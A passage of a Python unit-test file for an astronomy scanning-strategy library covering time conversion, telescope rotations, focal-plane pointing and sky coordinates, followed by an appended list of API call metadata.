obs_t3, time3, JD3 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day3)
JD_step3 = JD3[1:] - JD3[:-1]
t03 = Time(JD3[0], format='jd', location=loc)
t13 = Time(JD3[0] + JD_step3[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t3, time3, sampling_rate, JD3, JD_step3, t03, t13,
UTC=UTC, DST=DST, day=day3)
LCT_start4 = (12, 0, 0)
obs_t4, time4, JD4 = st.get_timeJD(LCT_start4, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day4)
JD_step4 = JD4[1:] - JD4[:-1]
t04 = Time(JD4[0], format='jd', location=loc)
t14 = Time(JD4[0] + JD_step4[0], format='jd', location=loc)
tests_1y(LCT_start4, LCD_start, obs_t4, time4, sampling_rate, JD4, JD_step4, t04, t14,
UTC=UTC, DST=DST, day=day4)
def test_spin_generator(self):
def general_spin_tests(phi, obs_time, time, sampling_rate, rpm, day=None):
if day:
self.assertEqual(len(phi), 86400 * sampling_rate)
else:
self.assertEqual(len(phi), obs_time * sampling_rate)
self.assertEqual(
np.sum(np.r_[True, phi[1:] > phi[:-1]] & np.r_[phi[:-1] > phi[1:], True]),
rpm * len(phi) / sampling_rate / 60)
self.assertEqual(phi.min(), 0)
self.assertTrue(phi.max() < 2 * np.pi)
obs_time1, obs_time2, obs_time3 = ((0, 30, 0, 0, 0), (0, 1, 0, 0, 0), (0, 0, 1, 0, 0))
sampling_rate1, sampling_rate2, sampling_rate3 = (1, 3, 50)
rpm1, rpm2, rpm3 = (13, 1, 5)
day1, day2, day3 = (2, None, None)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC,
DST=DST, day=day1)
phi1 = st.spin_generator(time1, rpm1)
general_spin_tests(phi1, obs_t1, time1, sampling_rate1, rpm1, day=day1)
obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC,
DST=DST, day=day2)
phi2 = st.spin_generator(time2, rpm2)
general_spin_tests(phi2, obs_t2, time2, sampling_rate2, rpm2, day=day2)
obs_t3, time3, JD3 = st.get_timeJD(LCT_start, LCD_start, sampling_rate3, obs_time3, UTC=UTC,
DST=DST, day=day3)
phi3 = st.spin_generator(time3, rpm3)
general_spin_tests(phi3, obs_t3, time3, sampling_rate3, rpm3, day=day3)
    def test_euler_rotation_matrix(self):
        """Euler rotation matrices match precomputed reference values.

        ``euler_rotation_matrix`` receives per-sample angle arrays (phi,
        theta, psi in radians) and must return one 3x3 matrix per sample.
        """
        # Case 1: constant (phi, theta) with psi = 0 -> the same matrix for
        # every sample.
        phi1, theta1, psi1 = np.radians(([10, 10, 10], [30, 30, 30], [0, 0, 0]))
        m1 = st.euler_rotation_matrix(phi1, theta1, psi1)
        M1 = np.array([[0.98480775301220802, -0.1503837331804353, 0.086824088833465152],
                       [0.17364817766693033, 0.85286853195244328, -0.49240387650610395],
                       [0, 0.49999999999999994, 0.86602540378443871]])
        # Case 2: constant angles with psi = 45 deg.
        phi2, theta2, psi2 = np.radians(([10, 10, 10], [30, 30, 30], [45, 45, 45]))
        m2 = st.euler_rotation_matrix(phi2, theta2, psi2)
        M2 = np.array([[0.59002688280798476, -0.80270159783205308, 0.086824088833465152],
                       [0.72585692637316113, 0.4802813184352156, -0.49240387650610395],
                       [0.35355339059327368, 0.35355339059327373, 0.86602540378443871]])
        # Case 3: psi varies per sample (45, 0, 45 deg) -> per-sample matrices
        # alternating between the two reference matrices above.
        phi3, theta3, psi3 = np.radians(([10, 10, 10], [30, 30, 30], [45, 0, 45]))
        m3 = st.euler_rotation_matrix(phi3, theta3, psi3)
        M3 = np.array([[[0.59002688280798476, -0.80270159783205308, 0.086824088833465152],
                        [0.72585692637316113, 0.4802813184352156, -0.49240387650610395],
                        [0.35355339059327368, 0.35355339059327373, 0.86602540378443871]],
                       [[0.98480775301220802, -0.1503837331804353, 0.086824088833465152],
                        [0.17364817766693033, 0.85286853195244328, -0.49240387650610395],
                        [0, 0.49999999999999994, 0.86602540378443871]],
                       [[0.59002688280798476, -0.80270159783205308, 0.086824088833465152],
                        [0.72585692637316113, 0.4802813184352156, -0.49240387650610395],
                        [0.35355339059327368, 0.35355339059327373, 0.86602540378443871]]])
        # For the constant-angle cases the expected stack is the single
        # reference matrix repeated along the sample axis.
        self.assertTrue(np.allclose(m1, np.repeat(M1[None, ...], 3, axis=0)))
        self.assertTrue(np.allclose(m2, np.repeat(M2[None, ...], 3, axis=0)))
        self.assertTrue(np.allclose(m3, M3))
def test_engine_rotations(self):
    """Engine rotations yield one sample per time step; only phi evolves."""
    duration = (0, 0, 0, 30, 0)
    _, time, _ = st.get_timeJD(LCT_start, LCD_start, 50, duration, UTC=UTC, DST=DST,
                               day=None)
    theta, phi, psi = st.get_engine_rotations(time, 7, zenith_distance, polarization_angle)
    # Every returned angle array is sampled exactly like the time axis.
    n_samples = len(time)
    for angles in (theta, phi, psi):
        self.assertEqual(len(angles), n_samples)
    # Zenith distance (theta) and boresight angle (psi) stay constant in time.
    self.assertTrue(np.allclose(np.diff(theta), 0))
    self.assertTrue(np.allclose(np.diff(psi), 0))
def test_fp_rotations(self):
    """Focal-plane rotations: cross-check matrix and quaternion rotations.

    Rotates focal-plane horn versors for two scanning configurations
    (single horn vs. full focal plane) and verifies the spherical and
    cartesian outputs against direct matrix products and the quaternion
    module ``q`` at randomly chosen time samples.
    """
    def general_tests(fp_pointings, fp_pointings_c):
        # psi (third spherical component) must stay constant in time.
        self.assertTrue(np.allclose(np.diff(fp_pointings_c[..., 2], axis=-1), 0))
        # Angular components stay within a full turn (degrees).
        self.assertTrue(np.degrees(fp_pointings[..., 0]).max() <= 365)
        self.assertTrue(np.degrees(fp_pointings[..., 1]).max() <= 365)
        # Cartesian pointings are unit vectors.
        self.assertTrue(np.allclose(np.sum(fp_pointings_c**2, axis=-1), 1))
    x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
                                   './ScanningTools/fp_data/fp_phi.txt')
    # Two configurations: 30 min @ 50 Hz (all days) vs. 90 days @ 1 Hz (day 10).
    obs_time1, obs_time2 = ((0, 0, 0, 30, 0), (0, 90, 0, 0, 0))
    rpm1, rpm2 = (7, 2)
    day1, day2 = (None, 10)
    sampling_rate1, sampling_rate2 = (50, 1)
    obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC,
                                      DST=DST, day=day1)
    theta1, phi1, psi1 = st.get_engine_rotations(time1, rpm1, zenith_distance,
                                                polarization_angle)
    obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC,
                                      DST=DST, day=day2)
    theta2, phi2, psi2 = st.get_engine_rotations(time2, rpm2, zenith_distance,
                                                polarization_angle)
    # n selects a single horn (index 30); None keeps the whole focal plane.
    n1 = 30
    n2 = None
    fp_rot1 = st.euler_rotation_matrix(phi1, theta1, psi1)
    fp_rot2 = st.euler_rotation_matrix(phi2, theta2, psi2)
    fp_pointings1 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,
                                        cartesian=False)
    fp_pointings1_c = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,
                                          cartesian=True)
    fp_pointings2 = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,
                                        cartesian=False)
    fp_pointings2_c = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,
                                          cartesian=True)
    # Spot-check a random time sample against the explicit rotation matrix
    # and against the quaternion implementation.
    i = np.random.randint(0, len(time1))
    self.assertTrue(np.allclose(np.dot(fp_rot1[i], x_fp[n1]), fp_pointings1_c[i]))
    rot1 = q.get_quaternion_from_euler(phi1[i], theta1[i], psi1[i])
    self.assertTrue(np.allclose(rot1.rotate_vector_by_quaternion(x_fp[n1]).get_versor(),
                                fp_pointings1_c[i, :]))
    general_tests(fp_pointings1, fp_pointings1_c)
    # Same spot-check for the full-focal-plane run: random time and horn.
    j = np.random.randint(0, len(time2))
    p = np.random.randint(0, n_horns)
    self.assertTrue(np.allclose(np.dot(fp_rot2[j], x_fp[p]), fp_pointings2_c[p][j]))
    rot2 = q.get_quaternion_from_euler(phi2[j], theta2[j], psi2[j])
    self.assertTrue(np.allclose(rot2.rotate_vector_by_quaternion(x_fp[p]).get_versor(),
                                fp_pointings2_c[p, j, :]))
    general_tests(fp_pointings2, fp_pointings2_c)
def test_get_horizon_coordinates(self):
    """Horizon coordinates must fall within the valid Alt/Az ranges.

    Bug fix: the inner ``general_tests`` helper was defined but never
    invoked, so this test previously executed no assertions at all. It is
    now applied to every computed (Alt, Az) pair.
    """
    def general_tests(Alt, Az):
        # Altitude in [0, 90] degrees, azimuth in [0, 360] degrees.
        self.assertTrue(np.degrees(Alt.max()) <= 90)
        self.assertTrue(np.degrees(Alt.min()) >= 0)
        self.assertTrue(np.degrees(Az.max()) <= 360)
        self.assertTrue(np.degrees(Az.min()) >= 0)
    x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
                                   './ScanningTools/fp_data/fp_phi.txt')
    obs_time = (0, 2, 0, 0, 0)
    sampling_rate = 1
    rpm = 4
    day = 1
    n1, n2 = (0, 15)  # two single-horn selections; None keeps all horns
    obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
                                  DST=DST, day=day)
    theta, phi, psi = st.get_engine_rotations(time, rpm, zenith_distance, polarization_angle)
    fpp = st.get_fp_rotations(phi, theta, psi, x_fp, n_horns, time, n=None, cartesian=False)
    fpp1 = st.get_fp_rotations(phi, theta, psi, x_fp, n_horns, time, n=n1, cartesian=False)
    fpp2 = st.get_fp_rotations(phi, theta, psi, x_fp, n_horns, time, n=n2, cartesian=False)
    Alt, Az = st.get_horizon_coordinates(fpp)
    Alt1, Az1 = st.get_horizon_coordinates(fpp1)
    Alt2, Az2 = st.get_horizon_coordinates(fpp2)
    # Actually run the range checks (previously missing).
    general_tests(Alt, Az)
    general_tests(Alt1, Az1)
    general_tests(Alt2, Az2)
def test_get_icrs_coordinates(self):
    """Check (Dec, Ra) from ``get_icrs_coordinates`` for slicing consistency
    and against catalogue positions of named sources.

    Bug fix: ``pointing_test`` previously ignored its ``JD`` parameter and
    closed over ``JD1`` when converting back to ICRS. Every call site passes
    ``JD1``, so results are unchanged, but the helper now honors its
    argument. The local name ``object`` (which shadowed the builtin) is
    renamed to ``src``.
    """
    x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
                                   './ScanningTools/fp_data/fp_phi.txt')
    obs_time = (0, 2, 0, 0, 0)
    sampling_rate = 0.001
    rpm = 3
    day1, day2 = (2, None)    # single day vs. whole observation
    n1, n2 = (48, None)       # single horn vs. whole focal plane
    obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
                                      DST=DST, day=day1)
    obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
                                      DST=DST, day=day2)
    theta1, phi1, psi1 = st.get_engine_rotations(time1, rpm, zenith_distance,
                                                polarization_angle)
    theta2, phi2, psi2 = st.get_engine_rotations(time2, rpm, zenith_distance,
                                                polarization_angle)
    fpp1 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1, cartesian=False)
    fpp2 = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n1, cartesian=False)
    fpp3 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n2, cartesian=False)
    fpp4 = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2, cartesian=False)
    Alt1, Az1 = st.get_horizon_coordinates(fpp1)
    Alt2, Az2 = st.get_horizon_coordinates(fpp2)
    Alt3, Az3 = st.get_horizon_coordinates(fpp3)
    Alt4, Az4 = st.get_horizon_coordinates(fpp4)
    Dec1, Ra1 = st.get_icrs_coordinates(JD1, loc, Alt1, Az1)     # 1: day 2;   n = 48
    Dec2, Ra2 = st.get_icrs_coordinates(JD2, loc, Alt2, Az2)     # 2: all days; n = 48
    Dec3, Ra3 = st.get_icrs_coordinates(JD1, loc, Alt3, Az3)     # 3: day 2;   n = all
    Dec4, Ra4 = st.get_icrs_coordinates(JD2, loc, Alt4, Az4)     # 4: all days; n = all
    Dec5, Ra5 = st.get_icrs_coordinates(JD1[0], loc, Alt1, Az1)  # 5: day 2 [t=0]; n = 48
    # Single-horn runs must match the corresponding slices of full runs.
    self.assertTrue(np.allclose(Dec1, Dec3[n1]))
    self.assertTrue(np.allclose(Ra1, Ra3[n1]))
    self.assertTrue(np.allclose(Dec1, Dec2[len(Dec1):]))
    self.assertTrue(np.allclose(Ra1, Ra2[len(Ra1):]))
    self.assertTrue(np.allclose(Dec1, Dec4[n1, len(Dec1):]))
    self.assertTrue(np.allclose(Ra1, Ra4[n1, len(Dec1):]))
    # With a scalar JD only the first sample can agree; the rest must not.
    self.assertTrue(np.allclose(Dec1[0], Dec5[0]))
    self.assertTrue(np.allclose(Ra1[0], Ra5[0]))
    self.assertFalse(np.allclose(Dec1[1:], Dec5[1:]))
    self.assertFalse(np.allclose(Ra1[1:], Ra5[1:]))

    def pointing_test(name, JD, loc):
        # Resolve the source, transform its catalogue position to horizon
        # coordinates at JD, convert back with our routine, and compare.
        src = SkyCoord.from_name(name)
        src_AltAz = src.transform_to(AltAz(obstime=Time(JD, format='jd'), location=loc))
        src_Alt = src_AltAz.alt.rad
        src_Az = src_AltAz.az.rad
        # Fixed: use the JD argument (the original closed over JD1).
        src_Dec, src_Ra = st.get_icrs_coordinates(JD, loc, src_Alt, src_Az)
        self.assertTrue(np.allclose(src.dec.rad, src_Dec))
        self.assertTrue(np.allclose(src.ra.rad, src_Ra))
    # NOTE(review): 'NCG67' looks like a typo for 'NGC67' — confirm it
    # actually resolves via SkyCoord.from_name before renaming it here.
    name1, name2, name3 = ('M33', 'crab', 'NCG67')
    pointing_test(name1, JD1, loc)
    pointing_test(name2, JD1, loc)
    pointing_test(name3, JD1, loc)
def test_get_practical_icrs_coordinates(self):
    """Practical ICRS coordinates must agree with the exact ones to within
    the configured pointing accuracy (Ra compared modulo 2*pi)."""
    def check_agreement(dec_exact, ra_exact, dec_fast, ra_fast, tol):
        self.assertTrue((np.abs(dec_exact - dec_fast) <= tol).all())
        # Fold Ra differences across the 0/2*pi wrap before comparing.
        ra_diff = np.abs(ra_exact - ra_fast).ravel()
        wrapped = ra_diff > 6
        ra_diff[wrapped] = 2 * np.pi - ra_diff[wrapped]
        self.assertTrue((ra_diff <= tol).all())
    x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
                                   './ScanningTools/fp_data/fp_phi.txt')
    _, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, 0.01, (0, 2, 0, 0, 0), UTC=UTC,
                                  DST=DST, day=2)
    theta1, phi1, psi1 = st.get_engine_rotations(time1, 3, zenith_distance,
                                                polarization_angle)
    tol = st.sex2dec(pointing_accuracy)
    # Check a single horn (48) and then the whole focal plane (None).
    for horn in (48, None):
        fpp = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=horn,
                                  cartesian=False)
        alt, az = st.get_horizon_coordinates(fpp)
        dec_exact, ra_exact = st.get_icrs_coordinates(JD1, loc, alt, az)
        dec_fast, ra_fast = st.get_practical_icrs_coordinates(JD1, loc, alt, az)
        check_agreement(dec_exact, ra_exact, dec_fast, ra_fast, tol)
def test_get_polarization_angles(self):
    """Projected polarization angles: valid range, and for a spin about the
    zenith (zenith distance 0, rpm 1) the angle sweeps linearly over a turn.

    Bug fix: ``np.linspace`` requires an integer sample count; the original
    passed the float ``sampling_rate * obs_t / 2 + 1`` (Python 3 true
    division), which raises TypeError under modern NumPy. The count is now
    computed once as an int.
    """
    def general_tests(x_fp_pol_versors, pol_ang_proj, fp_pol_pointings):
        # Projected angles come from arctan2, hence lie within [-pi, pi].
        self.assertTrue((np.max(pol_ang_proj, axis=-1) <= np.pi).all())
        self.assertTrue((np.min(pol_ang_proj, axis=-1) >= -np.pi).all())
    zenith_distance, zenith_distance1 = (0, 10)
    boresight_angle = 0
    obs_time, obs_time1 = ((0, 0, 0, 1, 0), (0, 1, 0, 0, 0))
    sampling_rate, sampling_rate1 = (50, 1)
    rpm, rpm1 = (1, 5)
    day, day1 = (None, 1)
    n, n1 = (0, None)
    obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
                                  DST=DST, day=day)
    obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC,
                                     DST=DST, day=day1)
    theta, phi, psi = st.get_engine_rotations(time, rpm, zenith_distance, boresight_angle)
    theta1, phi1, psi1 = st.get_engine_rotations(time1, rpm1, zenith_distance1, boresight_angle)
    theta2, phi2, psi2 = st.get_engine_rotations(time1, rpm1, zenith_distance, boresight_angle)
    x_fp_pol_angles, x_fp_pol_versors = st.get_full_fp_polarization_angles(
        './ScanningTools/fp_data/fp_psi.txt')
    n_horns = len(x_fp_pol_versors)
    fp_pol_pointings = st.get_fp_rotations(phi, theta, psi, x_fp_pol_versors, n_horns, time,
                                        n=n, cartesian=True)  # rad
    fp_pol_pointings1 = st.get_fp_rotations(phi1, theta1, psi1, x_fp_pol_versors, n_horns,
                                         time1, n=n1, cartesian=True)  # rad
    pol_ang_proj = st.get_polarization_angles(phi, theta, psi, x_fp_pol_versors, n_horns, time,
                                              n=n)
    pol_ang_proj1 = st.get_polarization_angles(phi1, theta1, psi1, x_fp_pol_versors, n_horns,
                                               time1, n=n1)
    pol_ang_proj2 = st.get_polarization_angles(phi2, theta2, psi2, x_fp_pol_versors, n_horns,
                                               time1, n=n1)
    # Expected sweep over one rotation: 0 -> pi, then -pi -> 0 (arctan2 wrap).
    # Integer sample count (was a float under Python 3 true division).
    half_count = int(sampling_rate * obs_t // 2) + 1
    pol_ang_proj_expected = np.concatenate((
        np.linspace(0, np.pi, half_count),
        np.linspace(-np.pi, 0, half_count)[1:-1]))
    self.assertTrue(np.allclose(np.arctan2(x_fp_pol_versors[..., 1], x_fp_pol_versors[..., 0]),
                                x_fp_pol_angles))
    # With zero zenith distance the first sample keeps the intrinsic angles.
    self.assertTrue(np.allclose(pol_ang_proj2[..., 0], x_fp_pol_angles))
    self.assertTrue(np.allclose(pol_ang_proj, pol_ang_proj_expected))
    general_tests(x_fp_pol_versors, pol_ang_proj, fp_pol_pointings)
    general_tests(x_fp_pol_versors, pol_ang_proj1, fp_pol_pointings1)
def test_get_scanning_strategy(self):
    """End-to-end check of ``get_scanning_strategy``: all returned arrays
    must have mutually consistent shapes for the 49-horn focal plane."""
    def general_tests(packed_values):
        # Unpack the full tuple returned by st.get_scanning_strategy.
        (x_fp, x_fp_pol_angles, n_horns, time, JD, theta, phi, psi, fp_pointings_spherical, Alt,
         Az, Dec, Ra, polarization_angles) = packed_values
        # Focal plane: 49 horn versors (3D) with one polarization angle each.
        self.assertTrue(np.allclose(x_fp.shape, (49, 3)))
        self.assertTrue(np.allclose(x_fp_pol_angles.shape, 49))
        self.assertEqual(n_horns, 49)
        # Time axis is shared by JD and all engine-rotation angles.
        self.assertTrue(np.allclose(time.shape, JD.shape))
        self.assertTrue(np.allclose(theta.shape, JD.shape))
        self.assertTrue(np.allclose(theta.shape, phi.shape))
        self.assertTrue(np.allclose(psi.shape, phi.shape))
        self.assertTrue(np.allclose(psi.shape, fp_pointings_spherical.shape[-2]))
        # Horizon, ICRS and polarization outputs all share the same leading
        # (horn, time) layout.
        self.assertTrue(np.allclose(Alt.shape, fp_pointings_spherical.shape[:-1]))
        self.assertTrue(np.allclose(Alt.shape, Az.shape))
        self.assertTrue(np.allclose(Dec.shape, Az.shape))
        self.assertTrue(np.allclose(Dec.shape, Ra.shape))
        self.assertTrue(np.allclose(polarization_angles.shape, Ra.shape))
        self.assertTrue(np.allclose(time.shape, Ra.shape[-1]))
        self.assertTrue(np.allclose(fp_pointings_spherical.shape[-2], time.shape))
    obs_time = (0, 2, 0, 0, 0)
    sampling_rate = 2
    zenith_distance, polarization_angle = (10, 0)
    rpm = 5
    n1, n2 = (15, None)   # single horn vs. whole focal plane
    day1, day2 = (1, None)  # single day vs. whole observation
    # Run once per combination of horn/day selection; shapes must hold in both.
    packed_values1 = st.get_scanning_strategy(
        obs_time, sampling_rate, zenith_distance, polarization_angle, rpm, n=n1, day=day2,
        LCT_start=(0, 0, 0), LCD_start=(1, 1, 2018), UTC=0, DST=0, LAT=np.array([28, 16, 24]),
        LONG=np.array([-16, 38, 32]), Height=2400,
        fp_theta_path='./ScanningTools/fp_data/fp_theta.txt',
        fp_phi_path='./ScanningTools/fp_data/fp_phi.txt',
        fp_psi_path='./ScanningTools/fp_data/fp_psi.txt')
    packed_values2 = st.get_scanning_strategy(
        obs_time, sampling_rate, zenith_distance, polarization_angle, rpm, n=n2, day=day1,
        LCT_start=(0, 0, 0), LCD_start=(1, 1, 2018), UTC=0, DST=0, LAT=np.array([28, 16, 24]),
        LONG=np.array([-16, 38, 32]), Height=2400,
        fp_theta_path='./ScanningTools/fp_data/fp_theta.txt',
        fp_phi_path='./ScanningTools/fp_data/fp_phi.txt',
        fp_psi_path='./ScanningTools/fp_data/fp_psi.txt')
    general_tests(packed_values1)
    general_tests(packed_values2)
if __name__ == '__main__':
    # Run the full test suite when the module is executed as a script.
    unittest.main()
| [
"ScanningTools.ScanningTools.dec2sex",
"numpy.radians",
"ScanningTools.ScanningTools.spin_generator",
"numpy.array",
"ScanningTools.ScanningTools.get_full_fp_polarization_angles",
"numpy.arctan2",
"unittest.main",
"ScanningTools.ScanningTools.get_nside_eff",
"ScanningTools.ScanningTools.hours2degree... | [((298, 364), 'numpy.array', 'np.array', (['[[-10, 45, 59], [30, 35, 15], [-180, 25, 20], [3, 4, 5]]'], {}), '([[-10, 45, 59], [30, 35, 15], [-180, 25, 20], [3, 4, 5]])\n', (306, 364), True, 'import numpy as np\n'), ((425, 462), 'numpy.array', 'np.array', (['[[23, 59, 16], [7, 56, 59]]'], {}), '([[23, 59, 16], [7, 56, 59]])\n', (433, 462), True, 'import numpy as np\n'), ((486, 541), 'numpy.array', 'np.array', (['[1.546585, -0.56, 0.3333333333333333, -1.001]'], {}), '([1.546585, -0.56, 0.3333333333333333, -1.001])\n', (494, 541), True, 'import numpy as np\n'), ((601, 621), 'numpy.array', 'np.array', (['[0, 0, 25]'], {}), '([0, 0, 25])\n', (609, 621), True, 'import numpy as np\n'), ((676, 698), 'numpy.array', 'np.array', (['[28, 16, 24]'], {}), '([28, 16, 24])\n', (684, 698), True, 'import numpy as np\n'), ((711, 734), 'numpy.array', 'np.array', (['[-16, 38, 32]'], {}), '([-16, 38, 32])\n', (719, 734), True, 'import numpy as np\n'), ((764, 798), 'ScanningTools.ScanningTools.get_location', 'st.get_location', (['LAT', 'LONG', 'Height'], {}), '(LAT, LONG, Height)\n', (779, 798), True, 'from ScanningTools import ScanningTools as st\n'), ((33054, 33069), 'unittest.main', 'unittest.main', ([], {}), '()\n', (33067, 33069), False, 'import unittest\n'), ((1136, 1204), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(1)', 'days': '(0)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=1, days=0, hours=0, min=0, sec=0, sidereal=True)\n', (1149, 1204), True, 'from ScanningTools import ScanningTools as st\n'), ((1230, 1283), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(1)', 'days': '(0)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)'}), '(years=1, days=0, hours=0, min=0, sec=0)\n', (1243, 1283), True, 'from ScanningTools import ScanningTools as st\n'), ((1311, 1379), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(0)', 
'days': '(1)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=0, days=1, hours=0, min=0, sec=0, sidereal=True)\n', (1324, 1379), True, 'from ScanningTools import ScanningTools as st\n'), ((1404, 1457), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(0)', 'days': '(1)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)'}), '(years=0, days=1, hours=0, min=0, sec=0)\n', (1417, 1457), True, 'from ScanningTools import ScanningTools as st\n'), ((1477, 1545), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(1)', 'days': '(1)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=1, days=1, hours=0, min=0, sec=0, sidereal=True)\n', (1490, 1545), True, 'from ScanningTools import ScanningTools as st\n'), ((1565, 1634), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(5)', 'days': '(30)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=5, days=30, hours=0, min=0, sec=0, sidereal=True)\n', (1578, 1634), True, 'from ScanningTools import ScanningTools as st\n'), ((1654, 1723), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(2)', 'days': '(17)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=2, days=17, hours=0, min=0, sec=0, sidereal=True)\n', (1667, 1723), True, 'from ScanningTools import ScanningTools as st\n'), ((1743, 1815), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(10)', 'days': '(21)', 'hours': '(15)', 'min': '(3)', 'sec': '(25)', 'sidereal': '(True)'}), '(years=10, days=21, hours=15, min=3, sec=25, sidereal=True)\n', (1756, 1815), True, 'from ScanningTools import ScanningTools as st\n'), ((2255, 2273), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['angles'], {}), '(angles)\n', (2265, 2273), True, 'from ScanningTools import ScanningTools as st\n'), ((2289, 2324), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', 
(['angles[0]'], {'radians': '(True)'}), '(angles[0], radians=True)\n', (2299, 2324), True, 'from ScanningTools import ScanningTools as st\n'), ((2588, 2601), 'ScanningTools.ScanningTools.dec2sex', 'st.dec2sex', (['t'], {}), '(t)\n', (2598, 2601), True, 'from ScanningTools import ScanningTools as st\n'), ((2616, 2632), 'ScanningTools.ScanningTools.dec2sex', 'st.dec2sex', (['t[0]'], {}), '(t[0])\n', (2626, 2632), True, 'from ScanningTools import ScanningTools as st\n'), ((2930, 2954), 'ScanningTools.ScanningTools.degrees2hours', 'st.degrees2hours', (['angles'], {}), '(angles)\n', (2946, 2954), True, 'from ScanningTools import ScanningTools as st\n'), ((2970, 3011), 'ScanningTools.ScanningTools.degrees2hours', 'st.degrees2hours', (['angles[2]'], {'decimal': '(True)'}), '(angles[2], decimal=True)\n', (2986, 3011), True, 'from ScanningTools import ScanningTools as st\n'), ((3231, 3257), 'ScanningTools.ScanningTools.hours2degrees', 'st.hours2degrees', (['hours[1]'], {}), '(hours[1])\n', (3247, 3257), True, 'from ScanningTools import ScanningTools as st\n'), ((3273, 3310), 'ScanningTools.ScanningTools.hours2degrees', 'st.hours2degrees', (['hours'], {'decimal': '(True)'}), '(hours, decimal=True)\n', (3289, 3310), True, 'from ScanningTools import ScanningTools as st\n'), ((3632, 3699), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(3, 37, 0)', '(1, 7, 2013)'], {'UTC': '(4)', 'DST': '(1)'}), '((3, 37, 0), (1, 7, 2013), UTC=4, DST=1)\n', (3659, 3699), True, 'from ScanningTools import ScanningTools as st\n'), ((3722, 3790), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(18, 0, 0)', '(19, 6, 2009)'], {'UTC': '(0)', 'DST': '(0)'}), '((18, 0, 0), (19, 6, 2009), UTC=0, DST=0)\n', (3749, 3790), True, 'from ScanningTools import ScanningTools as st\n'), ((4394, 4409), 'ScanningTools.ScanningTools.dec2sex', 'st.dec2sex', (['(0.1)'], {}), '(0.1)\n', (4404, 4409), True, 'from ScanningTools import 
ScanningTools as st\n'), ((4434, 4520), 'ScanningTools.ScanningTools.LocalCivilTime2LocalSiderealTime', 'st.LocalCivilTime2LocalSiderealTime', (['(18, 0, 0)', '(19, 6, 2009)', 'LONG'], {'UTC': '(0)', 'DST': '(0)'}), '((18, 0, 0), (19, 6, 2009), LONG, UTC=0,\n DST=0)\n', (4469, 4520), True, 'from ScanningTools import ScanningTools as st\n'), ((4785, 4804), 'numpy.array', 'np.array', (['[0, 5, 0]'], {}), '([0, 5, 0])\n', (4793, 4804), True, 'import numpy as np\n'), ((4840, 4860), 'numpy.array', 'np.array', (['[0, 21, 0]'], {}), '([0, 21, 0])\n', (4848, 4860), True, 'import numpy as np\n'), ((4896, 4916), 'numpy.array', 'np.array', (['[0, 32, 0]'], {}), '([0, 32, 0])\n', (4904, 4916), True, 'import numpy as np\n'), ((5434, 5530), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (5448, 5530), True, 'from ScanningTools import ScanningTools as st\n'), ((6770, 6842), 'ScanningTools.ScanningTools.get_full_fp_polarization_angles', 